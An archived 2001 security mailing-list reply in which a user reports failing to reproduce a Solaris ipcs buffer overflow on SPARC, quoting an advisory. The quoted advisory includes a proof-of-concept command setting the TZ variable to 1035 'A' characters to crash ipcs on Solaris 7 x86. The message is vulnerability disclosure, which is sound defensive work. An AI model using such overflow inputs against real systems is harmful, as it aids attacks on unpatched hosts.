Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: Mike Batchelor (mikebatTMCS.NET)
Date: Mon Apr 16 2001 - 09:22:15 CDT
Failed to reproduce this problem on Solaris 2.6 and 8 for SPARC. Ipcs
behaved normally, except for printing out the long string of "A"'s in the
output header where the timezone would appear.
> Solaris ipcs vulnerability
> Release Date:
> April 11, 2001
> Systems Affected:
> Solaris 7 (x86)
> Other versions of Solaris are most likely affected also.
> Discovered by:
> Riley Hassell rileyeeye.com
> bash-2.03$ TZ=`perl -e 'print "A"x1035'`
> bash-2.03$ /usr/bin/i86/ipcs
> IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
> Message Queue facility inactive.
> T ID KEY MODE OWNER GROUP
> Shared Memory:
> m 0 0x500004d3 --rw-r--r-- root root
> Semaphore facility inactive.
> Segmentation Fault (core dumped)